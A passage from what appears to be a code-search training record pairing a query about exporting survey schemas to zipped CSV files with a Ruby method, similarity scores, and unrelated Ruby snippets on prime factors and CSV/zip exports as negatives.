"def highest_prime_number_under(number)\n prime = number - 1\n counter = 1\n until is_prime?(prime)\n prime -= 1\n end\n return prime\n end",
"def factor_primes(num)\n\n return \"Not a valid number\" if num < 2\n\n for divisor in 2..(num - 1)\n while num % divisor == 0 \n (divisor * divisor > num) ? (return num) : (num /= divisor)\n # puts \"The divisor is #{divisor}\"\n # puts \"The new num is #{num}\"\n end\n end\n puts \"only divisible by 1 and itself\"\nend",
"def get_first_prime_factor(limit)\n (2..limit).each do |rangeNum|\n if isPrime?(rangeNum) && isFactor?(rangeNum, limit)\n return rangeNum\n end\n end\nend",
"def largest_prime_factor(number)\n # start with the number and go backwards\n while number > 0\n numb_split = number.to_s.split('')\n numb_split_length = numb_split.length\n #p numb_split[numb_split_length - 1]\n if numb_split[numb_split_length - 1] == \"5\" || numb_split[numb_split_length - 1] == \"0\" \n\n \n elsif number%2 == 0 && number > 2 \n # definitely not prime\n elsif number%2 == 0 && number%3 == 0\n \n \n else\n # test if number is prime\n # if number is prime\n \n\n p number.to_s\n end\n number -= 1 \n end\n\nend",
"def largest_prime(n)\n i = 2\n largest = 0\n while (i <= n)\n if (n % i == 0)\n while (n % i == 0 )\n n = n / i\n largest = i\n puts \"I am n #{n}\"\n puts \"I am i #{i}\"\n i += 1\n end\n end\n i += 1\n end\n return largest\nend",
"def highest_possible_factor\n Math.sqrt(number)\n end",
"def highest_possible_factor\n Math.sqrt(number)\n end",
"def largest_factor(n)\n arr = []\n num = 1\n while num < n \n if n % num == 0\n arr << num \n end\n num+=1\n end\n arr[-1]\nend",
"def factor_primes(num)\n\n ctr = num/2\n\n while ctr > 1\n if num%ctr == 0\n # if here then ctr is a factorial, now need to determine if this value is also a prime number\n is_prime = true\n for d in 2..(ctr - 1)\n if (ctr % d) == 0\n is_prime = false\n end\n end\n if is_prime\n return puts \"#{ctr} is a factorial of #{num} and the highest prime number\"\n end\n end\n ctr -= 1\n end\n\nend",
"def max_factor(n)\n\tfactors = [1, n]\n\tidx = 2\n\twhile idx < factors[-1]\n\t\tif factors[-1] % idx == 0\n\t\t\tnew = factors[-1] / idx\n\t\t\tfactors.pop\n\t\t\tfactors.push(idx)\n\t\t\tfactors.push(new)\n\t\t\tidx = 1\n\t\tend\n\t\tidx += 1\n\tend\n\treturn factors[-1]\nend",
"def getMaxPrime(numb)\n def isPrime(n)\n return false if n <= 1\n 2.upto(Math.sqrt(n).to_i) do |x|\n return false if n%x == 0\n end\n true\n end\n\n primes = []\n (2..10000).each { |x| primes << x if isPrime(x) }\n \n max = 0\n primes.each do |i|\n if numb % i == 0\n max = i\n end\n end\n puts max\nend",
"def largest_pfactor(number)\n i=2\n\n while i<=number\n\n if i==number\n puts number\n elsif number%i == 0\n number=number/i\n puts i\n i=2\n end\n\n if i%2==0\n i+=1\n else\n i+=2\n end\n\n end\n\nend",
"def prime_factors(n)\r\n num=Math.sqrt(n).round\r\n while num>0\r\n if n%num==0\r\n return num if prime?(num)\r\n end\r\n num-=1\r\n end\r\nend",
"def primo_factor(number)\t\n\n\tresult =[]\n\n\twhile number != 1\n\t\tfor i in 2..10000\n\t\t\tif number % i == 0 && number > 1\n\t\t\t\tresult << i\n\t\t\t\tnumber = number/i\t\t\t\n\t\n\t \t\tend\n\t\tend\n\tend\n\tputs \"The largest prime factor of #{number} is #{result.inspect}. Congrats!\"\n\nend",
"def prime_factorization(num)\n if is_prime?(num)\n return [num]\n end\n factors = []\n (2..num).each do |factor|\n if num % factor == 0\n factors << factor\n factors << prime_factorization(num/factor)\n \n break\n end\n end\n factors.flatten\n\nend",
"def smallest_multiple(n)\n def get_prime_factors(n, factors=[])\n return n if n.prime?\n \n Prime.first(n).each do |prime|\n if n % prime == 0\n factors << prime\n n /= prime\n break\n end\n end\n \n \n factors + [get_prime_factors(n)].flatten\n end\n \n def get_highest_exponents(n, factors=[])\n (2..n).each do |m|\n if get_prime_factors(m).is_a? Array\n factors << get_prime_factors(m)\n else\n factors << [m]\n end\n end\n \n highest = []\n Prime.first(n).select { |p| p < n }.each do |factor|\n highest << factors.sort_by { |f| f.count(factor) }[-1].select { |num| num == factor }\n end\n \n \n highest.flatten\n end\n\n\n get_highest_exponents(n).reduce(:*)\nend"
] |
[
"0.8718168",
"0.8678555",
"0.865899",
"0.8632884",
"0.86279887",
"0.8625121",
"0.86171204",
"0.86012983",
"0.86011016",
"0.8600345",
"0.85940826",
"0.85519683",
"0.85489714",
"0.8493698",
"0.84860057",
"0.8481071",
"0.8457284",
"0.8430555",
"0.8418677",
"0.8417911",
"0.84173393",
"0.8389803",
"0.83830005",
"0.836783",
"0.8353628",
"0.83421326",
"0.8339538",
"0.8329123",
"0.83141917",
"0.8311372",
"0.83080757",
"0.829703",
"0.8285651",
"0.82816905",
"0.8280453",
"0.8271972",
"0.82712054",
"0.82708865",
"0.82679015",
"0.82606894",
"0.8260549",
"0.825556",
"0.8228167",
"0.8177025",
"0.81577903",
"0.8153516",
"0.81514525",
"0.81334424",
"0.8105373",
"0.8102675",
"0.8096396",
"0.8088348",
"0.8056674",
"0.8047501",
"0.80473053",
"0.8013928",
"0.8009008",
"0.7967744",
"0.79610634",
"0.79603773",
"0.7956437",
"0.7944817",
"0.7892028",
"0.78770834",
"0.784638",
"0.7845164",
"0.7785145",
"0.7746739",
"0.7745141",
"0.7723353",
"0.77230203",
"0.76961774",
"0.7674946",
"0.76216364",
"0.75989693",
"0.7588915",
"0.75854594",
"0.75674874",
"0.7541412",
"0.7513098",
"0.7509706",
"0.750188",
"0.74815625",
"0.74636513",
"0.7430315",
"0.74243295",
"0.74017507",
"0.74010086",
"0.7374154",
"0.7329614",
"0.7329614",
"0.7326454",
"0.72816163",
"0.7280552",
"0.7239412",
"0.72294825",
"0.7216618",
"0.7199081",
"0.7185208",
"0.713994"
] |
0.72416675
|
94
|
create one or more CSV files (one CSV file per survey_schema) and archive it with ZIP
|
def create_zip_file(destination_file_name, csv_filenames_prefix, survey_schemas, administration_id)
raise 'empty survey_schemas are unsupported' if survey_schemas.empty?
working_dir = create_unique_dir
csv_filepaths = create_csv_files(working_dir, csv_filenames_prefix, survey_schemas, administration_id)
zip_files("#{working_dir}/#{destination_file_name}", csv_filepaths)
remove_files(csv_filepaths)
"#{working_dir}/#{destination_file_name}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def generate_records_file(format)\n file = Tempfile.new(\"patients-#{Time.now.to_i}\")\n patients = Record.where(\"test_id\" => self.id)\n \n if format == 'csv'\n Cypress::PatientZipper.flat_file(file, patients)\n else\n Cypress::PatientZipper.zip(file, patients, format.to_sym)\n end\n \n file\n end",
"def generate_records_file(format)\n file = Tempfile.new(\"patients-#{Time.now.to_i}\")\n patients = Record.where(\"test_id\" => self.id)\n Cypress::PatientZipper.zip(file, patients, format.to_sym)\n\n file\n end",
"def create_csvs(csv_count)\n for num in 1..csv_count\n headers = filtered_schema_headers(num)\n CSV.open(\"data#{num}.csv\", \"w\",:write_headers => true, :headers => headers) do |csv|\n populate_csv(csv, headers)\n end\n end\n end",
"def create_archive\n created = false\n empty = true\n Dir.mktmpdir do |tmpdir|\n # create manifest\n tmpmf = File.join(tmpdir, DulHydra.export_set_manifest_file_name)\n # create the zip archive\n zip_name = \"export_set_#{Time.now.strftime('%Y%m%d%H%M%S')}.zip\"\n zip_path = File.join(tmpdir, zip_name)\n Zip::ZipFile.open(zip_path, Zip::ZipFile::CREATE) do |zip_file|\n CSV.open(tmpmf, 'wb') do |manifest|\n manifest << archive_manifest_header\n pids.each do |pid|\n # get Fedora object\n begin\n object = ActiveFedora::Base.find(pid, :cast => true) \n # skip if object is not content-bearing or user lacks :read permission\n next unless object.has_content? and user.can?(:read, object)\n content_ds = object.datastreams[DulHydra::Datastreams::CONTENT]\n # use guaranteed unique file name based on PID and dsID \n temp_file_path = File.join(tmpdir, content_ds.default_file_name)\n # write content to file\n File.open(temp_file_path, 'wb', :encoding => 'ascii-8bit') do |f|\n content_ds.write_content(f)\n end\n # Use original source file name, if available; otherwise the generated file name\n # Note that we keep the path of the source file in order to reduce likelihood\n # name conflicts, and since it is easy to flatten zip contents on extraction.\n # However, we don't want the path of the generated temp file, just the basename.\n file_name = object.source.first || File.basename(temp_file_path)\n # discard leading slash, if present\n file_name = file_name[1..-1] if file_name.start_with? '/'\n # add file to archive\n zip_file.add(file_name, temp_file_path)\n # add row to manifest\n manifest << archive_manifest_row(file_name, object)\n rescue ActiveFedora::ObjectNotFoundError => e\n logger.error e\n next\n end\n end # document_list\n end # manifest\n # check if the zip file is emtpy\n empty = (zip_file.size == 0)\n # write manifest \n zip_file.add(DulHydra.export_set_manifest_file_name, tmpmf) unless empty\n end # zip_file\n # update_attributes seems to be the way to get paperclip to work \n # when not using file upload form submission to create the attachment\n created = !empty && update_attributes({:archive => File.new(zip_path, \"rb\")})\n end # tmpdir is removed\n created\n end",
"def export\n @survey = ISurvey.find_by_id(params[:id])\n if @survey.present?\n respond_to do |format|\n format.text {\n result = prepareData(params)\n render text: to_csv(result)\n }\n format.csv {\n result = prepareData(params)\n render text: result\n }\n format.zip {\n require 'zip'\n\n compressed_filestream = Zip::OutputStream.write_buffer(::StringIO.new('')) do |zos|\n zos.put_next_entry \"data-set-#{params[:id]}.csv\"\n result = prepareData(params)\n csv = to_csv(result)\n zos.print csv\n\n zos.put_next_entry \"import_command.sps\"\n zos.print File.read(Rails.root.join(\"spss/import_command.sps\"))\n\n zos.put_next_entry \"student_pre_format.tpf\"\n zos.print File.read(Rails.root.join(\"spss/student_pre_format.tpf\"))\n end\n\n compressed_filestream.rewind\n send_data compressed_filestream.read, filename: \"SPSS-Archive-#{Time.now.strftime(\"%-d_%-m_%y-%P\")}.zip\"\n }\n format.json {\n result = prepareData(params)\n render json: result\n }\n format.html {\n\n }\n end\n else\n redirect_to answers_path, notice: \"Couldn't find the survey for that ID.\"\n end\n end",
"def create_csv\n CSV.open('./data/slcsp.csv', 'wb') do |csv|\n csv << ['zipcode', 'rate']\n end\n build_csv\n end",
"def build_csv\n @zips_and_rates.each do |zip|\n CSV.open('./data/slcsp.csv', 'ab') do |csv|\n if zip[1].class == Array\n csv << [zip[0], nil]\n else\n csv << [zip[0], zip[1]]\n end\n end\n end\n end",
"def generate_all_csv_answers\n generate_csv_answers(csv_answers_values)\n end",
"def create_summary_csv(summary_csv_path)\n puts \"creating summary csv: #{summary_csv_path}\"\n\n CSV.open(summary_csv_path, \"wb\") do |csv|\n csv << SUMMARY_CSV_HEADINGS\n end\nend",
"def export_survey_answers(csv_survey_answers, survey_id)\n survey = Survey.find(survey_id)\n header = journal_csv_header.keys + survey.variables.map {|v| v.var}\n \n csv_rows = csv_survey_answers.inject([]) do |rows,csa|\n header_values = csa.journal_info.split(';;')\n rows << header_values + csa.answer.split(';;')\n rows\n end\n\n output = FasterCSV.generate(:col_sep => \";\", :row_sep => :auto, :encoding => 'u') do |csv_output|\n csv_output << header\n csv_rows.each { |line| csv_output << line }\n end\n end",
"def create_csv &block\n file = create_tempfile \"csv\"\n CSV.open file.path, \"w\", &block\n file\n end",
"def generate_csv\n\n fields = @resource[:class].typus_fields_for(:csv).collect { |i| i.first }\n\n require 'csv'\n if CSV.const_defined?(:Reader)\n # Old CSV version so we enable faster CSV.\n begin\n require 'fastercsv'\n rescue Exception => error\n raise error.message\n end\n csv = FasterCSV\n else\n csv = CSV\n end\n\n filename = \"#{Rails.root}/tmp/export-#{@resource[:self]}-#{Time.now.utc.to_s(:number)}.csv\"\n\n options = { :conditions => @conditions, :batch_size => 1000 }\n\n csv.open(filename, 'w', :col_sep => ';') do |csv|\n csv << fields\n @resource[:class].find_in_batches(options) do |records|\n records.each do |record|\n csv << fields.map { |f| record.send(f) }\n end\n end\n end\n\n send_file filename\n\n end",
"def export_csofeed\n # Create header row #\n header = ['Record Type', 'Device Key', 'IP Addresses', 'MAC Addresses', 'System Name', 'FQDN', 'Status', 'Function', 'Runs MOTS/PRISM Apps', 'MOTS/PRISM IDs', 'Runs Non-MOTS/PRISM Apps', 'Internet Facing', 'Device Criticality', 'Device Owner', 'Operating System', 'Operating System Version', 'Administrator\\'s ATTUID', 'Support Group', 'Serial Number', 'Asset Tag Number', 'Location', 'Location CLLI', 'Comments' \"\\n\"]\n csvdoc = [header.join(',')]\n Node.all.each do |node|\n result = make_csoline(node)\n csvdoc << result.join(',') if result\n end\n fname = \"public/csvexports/csofeed_#{Time.now.strftime(\"%d%m%Y\")}.csv.gz\"\n File.open(fname, 'w') do |f|\n gz = Zlib::GzipWriter.new(f)\n gz.write csvdoc\n gz.close\n end\n end",
"def save_to_csv\n csv_options = { col_sep: ',', quote_char: '\"' }\n CSV.open(@file_path, 'wb', csv_options) do |csv_row|\n # To store recipes, we loop over cookbook recipes array (see initializer)\n @recipes.each do |recipe|\n # CSV SHOULD NOT TAKE INSTANCES\n # We must individually separate the name and description from the instances\n # To then store them in array format into each row of the CSV\n # One row per recipe\n csv_row << [recipe.name, recipe.description]\n end\n end\n end",
"def generate_csv\n\n fields = @resource.typus_fields_for(:csv)\n\n require 'csv'\n if CSV.const_defined?(:Reader)\n # Old CSV version so we enable faster CSV.\n begin\n require 'fastercsv'\n rescue Exception => error\n raise error.message\n end\n csv = FasterCSV\n else\n csv = CSV\n end\n\n filename = Rails.root.join(\"tmp\", \"export-#{@resource.to_resource}-#{Time.now.utc.to_s(:number)}.csv\")\n\n options = { :conditions => @conditions, :batch_size => 1000 }\n\n csv.open(filename, 'w', :col_sep => ';') do |csv|\n csv << fields.keys\n @resource.find_in_batches(options) do |records|\n records.each do |record|\n csv << fields.map do |key, value|\n case value\n when :transversal\n a, b = key.split(\".\")\n record.send(a).send(b)\n when :belongs_to\n record.send(key).to_label\n else\n record.send(key)\n end\n end\n end\n end\n end\n\n send_file filename\n\n end",
"def export_scholarship(specialization)\n beg = Date.parse(TermsCalculator.starting_in(2008)) - 1.month\n fin = beg + 1.month\n sql = 'payed_on > ? and payed_on < ? and index_id = ?'\n indices = Index.find_for_scholarship(User.find_by_login('ticha'),\n :conditions => [\"specialization_id = ?\", specialization],\n :paying_date => fin)\n unless indices.empty?\n (1..13).each do |month|\n filename = '%s_%s.csv' % [specialization.code, fin.strftime('%m_%y')]\n File.open(filename, 'wb') do |outfile|\n CSV::Writer.generate(outfile, ';') do |csv|\n csv << [specialization.name, beg.strftime('%Y-%m-%d'),\n fin.strftime('%Y-%m-%d'), '', '']\n csv << ['name', 'type', 'amount', 'disponent', 'payed_on']\n indices.each do |index|\n if scholarships = Scholarship.find(:all, :conditions =>\n [sql, beg, fin, index.id])\n scholarships.each do |scholarship|\n csv << [scholarship.index.student.display_name,\n scholarship.type.to_s[0, 1], scholarship.amount, scholarship.disponent,\n scholarship.payed_on.strftime('%Y-%m-%d')]\n end\n end\n end\n end\n end\n @@mylog.debug 'Exported' + filename\n system 'iconv -f utf-8 -t cp1250 %s > %s' % [filename, filename.gsub(/\\.csv/, '.win.csv')]\n system 'rm %s' % filename\n beg += 1.month\n fin = beg + 1.month\n end\n end\n end",
"def export_survey_answers(csv_survey_answers, survey_id)\n survey = Survey.find(survey_id)\n header = journal_csv_header.keys + ['follow_up'] + survey.variables.map {|v| v.var}\n \n csv_rows = csv_survey_answers.inject([]) do |rows,csa|\n puts \"csa.journal.nil? #{csa.inspect} #{csa.journal.inspect} sa: #{csa.survey_answer.inspect}\" if csa.journal.nil?\n\n journal_entry = JournalEntry.where(\n survey_answer_id: csa.survey_answer_id,\n center_id: csa.center_id, \n group_id: csa.team_id).first\n info = \n if !journal_entry.nil? && journal_entry.answer_info\n journal_entry.answer_info.split(\";\")\n elsif csa.journal_info\n csa.journal_info.split(\";;\")\n elsif csa.survey_answer\n csa.survey_answer.info.values\n else\n puts \"no answer_info found in journal_entry or survey_answer: #{csa.inspect} je: #{csa.journal_entry.inspect}\"\n [\"ingen info: sa_id: #{csa.survey_answer_id} csa: #{csa.inspect} \"]\n end\n\n if !csa || !csa.answer\n puts \"No csa: #{info.inspect}\"\n end\n rows << info + [FollowUp.to_value(csa.follow_up)] + (csa && csa.answer && csa.answer.split(';;') || [] )\n rows\n end\n\n output = CSV.generate(:col_sep => \";\", :row_sep => :auto, :encoding => 'utf-8') do |csv_output|\n csv_output << header\n csv_rows.each { |line| csv_output << line }\n end\n end",
"def zip_app_export_migrations\n temp_file = Tempfile.new([ZipTempFilePrefix, '.zip'])\n # This is the tricky part\n # Initialize the temp file as a zip file\n Zip::OutputStream.open(temp_file) { |zos| }\n\n # Add files to the zip file as usual\n Zip::File.open(temp_file.path, Zip::File::CREATE) do |zip|\n Dir.glob(\"#{app_export_dir}/*.rb\").each do |path|\n filename = path.split('/').last\n zip.add(filename, path)\n end\n end\n temp_file\n end",
"def create_survey_answer_export(survey_id, survey_answers)\n # Spawnling.new(:method => :fork) do\n # spawn_block do\n# Thread.new do\n logger.info \"EXPORT create_survey_answer_export: survey: #{survey_id} #{survey_answers.size}\"\n data = ExportAnswersHelper.new.export_survey_answers(survey_answers, survey_id) # TODO: add csv generation on save_answer & change_answer\n logger.info \"create_survey_answer_export: created data survey: #{survey_id} #{survey_answers.size}\"\n # write data\n self.export_file = ExportFile.create(:data => data,\n # :type => 'text/csv; charset=utf-8; header=present',\n :filename => \"eksport_svar_#{Time.now.to_date.to_s}_#{survey_id}\" + \".csv\",\n :content_type => \"application/vnd.ms-excel\")\n\n self.param1 = survey_id\n self.update_attribute(\"status\", \"Completed\")\n logger.info \"EXPORT set status completed\"\n self.save\n logger.info \"EXPORT saved status\"\n # logger.info \"create_survey_answer_export: finished! survey: #{survey_id} #{survey_answers.size}\"\n# end\n end",
"def write_files(cases, laws)\n File.write(@prefix+\"redlatam_cases.json\", JSON.pretty_generate(cases))\n File.write(@prefix+\"redlatam_laws.json\", JSON.pretty_generate(laws))\n File.write(@prefix+\"redlatam_cases.csv\", gen_csv(@prefix+\"redlatam_cases.json\", @case_h))\n File.write(@prefix+\"redlatam_laws.csv\", gen_csv(@prefix+\"redlatam_laws.json\", @law_h))\n end",
"def initialize_csv\n CSV.open(\"results.csv\", \"wb\") do |csv|\n csv << [\"class\", \"title of course\", \"credits\"]\n end\nend",
"def create_csv()\n hashes = Transaction.all_as_hashes\n CSV.generate do |csv|\n # Adds the keys as headings on the first line\n csv << hashes.first.keys\n # Iterates through the transactions and populates CSV\n hashes.each do |hash|\n csv << hash.values\n end\n end\n end",
"def create_csv\n title = [\"Typed Word\",\"Suggestion\", \"Score\", \"Frequency\", \"ED?\", \"Count ED\", \"Year\"]\n CSV.open('output.csv', 'a') do |csv|\n csv << title\n end\n end",
"def generate_Excel\r\n @db_list.each{|category,value|\r\n# f = open(file,\"w\")\r\n db_name = value[2]\r\n table = \"historical\"\r\n db = SQLite3::Database.new(\"#{@db_dir}/#{db_name}\")\r\n case db_name\r\n when /eurusd/, /audusd/,/nzdusd/\r\n num = 6\r\n else\r\n num = 4\r\n end\r\n# getCSV(f,db,table,num)\r\n file = \"#{@result_dir}/#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n make_excel(file,db,table,num,100)\r\n file = \"#{@result_dir}/ALL_#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n make_excel(file,db,table,num,nil)\r\n \r\n# f.close\r\n }\r\n=begin\r\n # All days CSV\r\n @db_list.each{|category,value|\r\n file = \"#{@result_dir}/ALL_#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n f = open(file,\"w\")\r\n db_name = value[2]\r\n table = \"historical\"\r\n db = SQLite3::Database.new(\"#{@db_dir}/#{db_name}\")\r\n case db_name\r\n when /eurusd/, /audusd/,/nzdusd/\r\n num = 6\r\n else\r\n num = 4\r\n end\r\n getCSV_all(f,db,table,num)\r\n make_excel(file,db,table,num,nil)\r\n f.close\r\n }\r\n=end\r\n end",
"def create_report(links, protocol, host_url)\n CSV.open('link_details.csv', 'w+') do |csv|\n links.each do |link_name, link_path|\n insert_record(csv, link_name, link_path, protocol, host_url)\n end\n end\n end",
"def write_archives\n self.collated.keys.each do |year|\n if self.layouts.key? 'archive_yearly'\n self.write_archive(year.to_s, 'archive_yearly')\n end\n\n self.collated[year].keys.each do |month|\n if self.layouts.key? 'archive_monthly'\n self.write_archive(File.join(year.to_s, month.to_s),\n 'archive_monthly')\n end\n\n self.collated[year][month].keys.each do |day|\n if self.layouts.key? 'archive_daily'\n self.write_archive(File.join(year.to_s, month.to_s, day.to_s),\n 'archive_daily')\n end\n end\n end\n end\n end",
"def collection_to_csv(filepaths, csv_name)\n output_file = CSV.open(csv_name, \"w\")\n header = JSON.parse!(File.read(filepaths[0])).keys\n output_file << header\n\n filepaths.each do |path|\n data = JSON.parse!(File.read(path))\n output_file << data.values\n end\nend",
"def generate_bulk_export\n # Delete the bulk_export directory if it exists.\n FileUtils.rm_rf(\"bulk_export\")\n\n get_all_insurance_plans\n get_all_location_resources\n p \"===============================================================\"\n p \"Creating the Bulk export folder output ...\"\n generate_payer_bulk_data\n generate_formulary_bulk_data\nend",
"def exported_report\n #The folder where the filename points to, is actually in the ~/rails/Forester because of capistrano as\n # the Apache point to ~/rails/Forester/current symlinkfolder and capistrano updates the them. \n @filename = \"quarterly_report_#{params[:year]}_#{params[:quarter]}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n if params[:quarter] == \"1\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{(params[:year].to_i-1)}-12-31' AND delivery_date<'#{params[:year]}-04-01'\")\n else\n if params[:quarter] == \"2\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-03-31' AND delivery_date<'#{params[:year]}-07-01'\")\n else\n if params[:quarter] == \"3\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-06-30' AND delivery_date<'#{params[:year]}-10-01'\")\n else\n if params[:quarter] == \"4\" then\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-09-30' AND delivery_date<'#{(params[:year].to_i+1)}-01-01'\")\n end\n end\n end\n end\n \n #Writing to file starts with empty line.\n File.open(\"#{@file_path}#{@filename}\", 'w') do |writer|\n writer.puts(\"\\n\")\n end\n \n #From the tickets delivered in the given quarter, the job ids are gathered here\n @job_ids = @tickets.collect {|i| i.job_id }\n @jobs = Job.find(@job_ids)\n \n #To have less DB calls, all specie records are put into an instance variable\n @species = Specie.all\n \n #Goes through all the jobs, for each sums up all the mbf and tonnages and writes them into the file\n # per specie.\n @jobs.each do |k|\n @my_tickets = []\n @tickets.each do |l|\n if l.job_id == k.id\n @my_tickets.push(l)\n end\n end\n \n @amounts = []\n \n @species.length.times do\n @amounts.push([0, 0])\n end\n \n @total_pulp = 0\n \n @my_tickets.each do |i|\n i.load_details.each do |j|\n if i.wood_type == 3 || j.species_id == 0 #wood type 3 & species_id 0 == pulp\n @total_pulp = @total_pulp + j.tonnage\n next #If load is pulp, it has only one load detail so program jups to next loop\n end\n #Amounts of mbf/tonnage are summed up here per ticket according to their specie.\n @amounts[j.species_id-1][0] = @amounts[j.species_id-1][0] + j.mbfss #This and triple-n tonnage in next are helper methods. See their documentation.\n @amounts[j.species_id-1][1] = @amounts[j.species_id-1][1] + j.tonnnage\n end\n end\n \n #Finally, the values calculated above are written into the file.\n File.open(\"#{@file_path}#{@filename}\", 'a') do |writer|\n writer.puts \"Job, #{k.name}\"\n writer.puts \"Category, MBF, Tonnage\"\n @species.each do |i|\n writer.puts \"#{i.code}, #{round_to(@amounts[i.id-1][0].to_f, 2)}, #{round_to(@amounts[i.id-1][1].to_f, 2)}\"\n end\n writer.puts \"Pulp, ,#{round_to(@total_pulp.to_f, 2)}\"\n writer.puts(\"\\n\")\n end\n end\n \n #The file created is opened in 'r' (== read) mode and send to user\n @file = File.open(\"#{@file_path}#{@filename}\", 'r')\n \n send_data(@file.read, :type => \"csv\", :filename => @filename)\n end",
"def save_csv\n CSV.open(@csv_file_path, \"wb\") do |csv|\n csv << [\"name\", \"description\", \"rating\", \"prep_time\", \"done\"]\n @recipes.each do |recipe|\n csv << [recipe.name, recipe.description, recipe.rating, recipe.prep_time, recipe.done?]\n end\n end\n end",
"def process_csv_project(filename, output_path)\n analysis = OpenStudio::Analysis.from_csv(filename)\n analysis.save \"#{output_path}.json\"\n analysis.save_zip \"#{output_path}.zip\"\n\n OpenStudio::Analysis.aws_instance_options(filename)\nend",
"def create_csv_for_GH(csv_data)\n\n csv_string = CSV.open(\"#{$basefile}GH.csv\", \"wb\") do |csv|\n\n csv_data.each do |hash|\n csv << hash\n\n end\n end\n end",
"def generate_zip_file!(sheet_scope)\n temp_dir = Dir.mktmpdir\n\n\n filename = \"#{name.gsub(/[^a-zA-Z0-9_-]/, \"_\")}_#{created_at.strftime(\"%H%M\")}\"\n all_files = generate_all_files(sheet_scope, temp_dir, filename)\n\n return if all_files.empty?\n\n # Create a zip file\n zipfile_name = File.join(temp_dir, \"#{filename}.zip\")\n Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|\n all_files.uniq.each do |location, input_file|\n # Two arguments:\n # - The name of the file as it will appear in the archive\n # - The original file, including the path to find it\n zipfile.add(location, input_file) if File.exist?(input_file) && File.size(input_file) > 0\n end\n end\n zipfile_name\n\n if File.exist?(zipfile_name)\n export_succeeded(zipfile_name)\n else\n export_failed(failure_details)\n end\n ensure\n # Remove the directory.\n FileUtils.remove_entry temp_dir\n end",
"def write_csv\n # header = \"name, description\"\n CSV.open(@csv_file, 'wb') do |csv|\n # csv << header\n @recipes.each do |row|\n csv << [row.name, row.description, row.cooking_time, row.difficulty, row.tested]\n end\n end\n end",
"def generate_csv_file(file_path, row_data)\n CSV.open(file_path, \"wb\") do |csv|\n csv << [\"first_name\", \"last_name\", \"dob\", \"member_id\", \"effective_date\", \"expiry_date\", \"phone_number\"]\n row_data.each { |row| csv << row }\n end\nend",
"def write_export_data_to_files(config, patients, inner_batch_size)\n case config[:format]\n when 'csv'\n csv_export(config, patients, inner_batch_size)\n when 'xlsx'\n xlsx_export(config, patients, inner_batch_size)\n end\n end",
"def createMergeCsvFiles()\n fileNames = Array.new\n \n # key:API name, value: array of data array(size = number of csv files)\n bufHash = Hash.new\n @csvFiles.each {|file|\n # csv data: array of array\n csvDatas = readCSV(file)\n # To get the keyword(apiNames) from the first column.\n apiNames = csvDatas[0]\n # convert the data of each row to column\n # Limitaion: The size of the array elements of csvDatas must be the same.\n newCsvDatas = csvDatas.transpose()\n \n if (bufHash.size == 0)\n # set data for keyword\n apiNames.each_with_index {|keyword, idx|\n bufHash[keyword] = [ newCsvDatas[idx] ]\n }\n else\n # set data for keyword\n bufHash.each {|keyword,val|\n # key exist?\n idx = apiNames.find_index(keyword)\n if (idx != nil)\n bufHash[keyword].push( newCsvDatas[idx] )\n end\n }\n end\n \n }\n \n # create csv for key\n bufHash.each {|keyword, values|\n strBufArray = Array.new\n # values: array of array\n values.each_with_index {|csvData, csvIndex|\n csvData.each_with_index {|elem, index|\n if (csvIndex == 0)\n if (index == 0)\n strBufArray[index] = sprintf(\"number,%d_%s\", csvIndex+1, elem)\n else\n strBufArray[index] = sprintf(\"%d,%s\", index, elem)\n end\n else\n if (index == 0)\n strBufArray[index] += sprintf(\",%d_%s\", csvIndex+1, elem)\n else\n strBufArray[index] += sprintf(\",%s\", elem)\n end\n end\n }\n }\n \n strBuf = strBufArray.join(\"\\n\")\n \n # generate filename by date\n filename = Time.now.strftime(\"%Y%m%d%H%M%S\")\n filename = sprintf(\"%s_%s.csv\", filename, keyword)\n filename = filename.gsub(/:+/,'_')\n File.open(filename, 'w') { |file|\n file.puts(strBuf)\n }\n fileNames.push(filename)\n }\n \n @csvFiles = fileNames\n end",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => 'es_setups.path, es_setups.name'\n setups = EsSetup.find :all, :order => @sort, :conditions => session[:conditions_setup]\n # Creation of the file\n file_name = \"setups_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << [\"Chemin\".trn,\"Nom\".trn,\"Valeur\".trn,\"Type\".trn, \"Lecture seule\".trn]\n setups.each do |t|\n csv << [t.path,t.name,t.value,t.type_data,(t.read_only=='Y' ? 'V' : '')]\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def create_csv_file(keys, strings, comments = nil)\n raise \"csv_filename must not be nil\" unless @csv_filename\n CSV.open(@csv_filename, \"wb\") do |csv|\n @headers << \"Comments\" if !comments.nil? && !comments.empty?\n csv << @headers\n keys.each do |key|\n line = [key]\n default_val = strings[@default_lang][key] if strings[@default_lang]\n @filenames.each do |fname|\n lang = fname\n current_val = (lang != default_lang && strings[lang][key] == default_val) ? '' : strings[lang][key]\n line << current_val\n end\n line << comments[key] if comments && comments[key]\n csv << line\n end\n puts \"Done\"\n end\n end",
